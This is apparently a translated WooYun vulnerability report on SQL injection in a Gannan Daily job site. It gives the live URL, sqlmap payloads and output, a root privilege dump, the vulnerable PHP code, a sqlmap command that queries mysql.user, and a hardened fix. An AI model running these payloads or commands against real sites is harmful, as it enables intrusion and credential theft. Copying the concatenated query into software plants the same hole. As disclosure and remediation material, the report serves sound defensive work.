
Vulnerability summary

Defect ID: wooyun-2014-049324

Title: SQL injection on a site run by Gannan Daily (root privileges)

Vendor: Gannan Daily

Author: m_vptr

Submitted: 2014-01-20 11:59

Fix deadline: 2014-03-06 12:00

Published: 2014-03-06 12:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-01-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2014-03-06: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection running as root; the PHP source can be downloaded, and the database configuration was found in the source.

Detailed description:

Injection point: http://www.gzjtw.com.cn/jobview.php?id=164%E2%80%98 (the %E2%80%98 is the URL-encoded U+2018 left single quotation mark; the hex constant 0x313634254532253830253938 in the boolean-based payload below is just this original value, 164%E2%80%98, re-encoded by sqlmap)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8318=8318) THEN 0x313634254532253830253938 ELSE 8318*(SELECT 8318 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: UNION query
Title: MySQL UNION query (random number) - 21 columns
Payload: id=-5538 UNION ALL SELECT 4192,4192,4192,4192,4192,4192,CONCAT(0x7172717471,0x73706f61517573634b63,0x71797a6371),4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192,4192#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: id=-9332 OR 9584=SLEEP(5)
---
[16:20:07] [INFO] testing MySQL
[16:20:07] [INFO] confirming MySQL
[16:20:07] [INFO] the back-end DBMS is MySQL
[16:20:07] [INFO] actively fingerprinting MySQL
[16:20:07] [INFO] executing MySQL comment injection fingerprint
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
comment injection fingerprint: MySQL 5.0.90
Checking privileges:
database management system users roles:
[*] 'root'@'localhost' (administrator) [25]:
role: ALTER
role: ALTER ROUTINE
role: CREATE
role: CREATE ROUTINE
role: CREATE TEMPORARY TABLES
role: CREATE USER
role: CREATE VIEW
role: DELETE
role: DROP
role: EXECUTE
role: FILE
role: INDEX
role: INSERT
role: LOCK TABLES
role: PROCESS
role: REFERENCES
role: RELOAD
role: REPLICATION CLIENT
role: REPLICATION SLAVE
role: SELECT
role: SHOW DATABASES
role: SHOW VIEW
role: SHUTDOWN
role: SUPER
role: UPDATE
--os-shell did not work, but it leaked the web root path, so I pulled the source code and had a look.
D__phpnow_htdocs_jobview.php

<?php
require_once("global.php");
$id=$_GET['id'];                                        // taken straight from the query string, no validation
$exes="select * from jobinfotable where jid=".$id."";   // concatenated into the SQL text: this is the injection point
$rss=mysql_query($exes);
$rows=mysql_fetch_array($rss);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
......


Following the trail, I found the database configuration:
D__phpnow_htdocs_kf8inc_Kf8connFile.inc.php

<?php 
$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password=xxx;
$mysql_database='gzjtw';
...

Proof of vulnerability:

available databases [9]:
[*] gouwu
[*] gzjtw
[*] hunqin
[*] information_schema
[*] mysql
[*] test
[*] tianxia
[*] xinyu
[*] zx
Database: mysql
[17 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+
I will not paste the other databases and tables.
sqlmap.py -u "http://www.gzjtw.com.cn/jobview.php?id=164%E2%80%98" -D mysql --sql-query "SELECT * from mysql.user limit 1"
[08:40:59] [INFO] fetching SQL SELECT statement query output: 'SELECT * from mysql.user limit 1'
[08:40:59] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[08:40:59] [INFO] fetching columns for table 'user' in database 'mysql'
[08:40:59] [INFO] the SQL query used returns 37 entries
[08:40:59] [INFO] the query with expanded column name(s) is: SELECT Alter_priv, Alter_routine_priv, Create_priv, Create_routine_priv, Create_tmp_table_priv, Create_user_priv, Create_view_priv, Delete_priv, Drop_priv, Execute_priv, File_priv, Grant_priv, Host, Index_priv, Insert_priv, Lock_tables_priv, Password, Process_priv, References_priv, Reload_priv, Repl_client_priv, Repl_slave_priv, Select_priv, Show_db_priv, Show_view_priv, Shutdown_priv, Super_priv, Update_priv, `User`, max_connections, max_questions, max_updates, max_user_connections, ssl_cipher, ssl_type, x509_issuer, x509_subject FROM mysql.user LIMIT 1
SELECT * from mysql.user limit 1 [1]:
[*] Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, localhost, Y, Y, Y, xxxxx, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, Y, root, 0, 0, 0, 0, , , ,

Fix:

Filter the input: jid is numeric, so cast id to an integer (or bind it through a prepared statement) before it reaches the query. The application should also not connect to MySQL as root.
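The fix above, worked through as an added example that is not part of the original report or of the site's own code: the vulnerable jobview.php query from the detailed description, rewritten with integer validation and a prepared statement. It assumes a mysqli connection (with the mysqlnd driver, which get_result() requires), a hypothetical low-privilege database account gzjtw_web in place of root, and the table jobinfotable and column jid shown in the report.

```php
<?php
// Added example, not the site's code. Hardened replacement for the
// "select * from jobinfotable where jid=".$id query shown in the report.
// Assumes a mysqli connection ($conn) built with mysqlnd so that
// get_result() is available; gzjtw_web is a hypothetical account name.

function fetch_job(mysqli $conn, $raw_id)
{
    // 1. Validate: jid is an integer key, so anything that is not a positive
    //    integer is rejected outright. The report's 164' probe and the
    //    "-5538 UNION ALL SELECT ..." payload never reach the database.
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Prepared statement: the SQL text is fixed and the value travels
    //    separately, so even a string parameter could not change the query.
    $stmt = $conn->prepare('SELECT * FROM jobinfotable WHERE jid = ?');
    if ($stmt === false) {
        // Never echo $conn->error to the client (it leaks table names and paths).
        error_log('jobview prepare failed: ' . $conn->error);
        http_response_code(500);
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // null when no such jid
    $stmt->close();
    return $row;
}

// Hypothetical least-privilege account instead of root: SELECT (and the
// DML the site really needs) on gzjtw.* only, and no FILE privilege.
$conn = new mysqli('localhost', 'gzjtw_web', 'REDACTED', 'gzjtw');
$conn->set_charset('utf8mb4');

$raw  = isset($_GET['id']) ? $_GET['id'] : '';
$rows = fetch_job($conn, $raw);
if ($rows === null) {
    exit;
}
// ... render $rows as the original template does below ...
```

The integer check alone already stops every payload listed in the sqlmap output, because jid is numeric; the prepared statement is what keeps the fix sound if the parameter were ever a string. Separately from the query, the FILE privilege that root holds in the privilege dump above is what lets an injection read files such as jobview.php and Kf8connFile.inc.php off the disk, so moving the application to an account that lacks it removes the source-disclosure half of this report even if another injection is found.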

Copyright notice: please credit the source when reposting: m_vptr@WooYun


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined.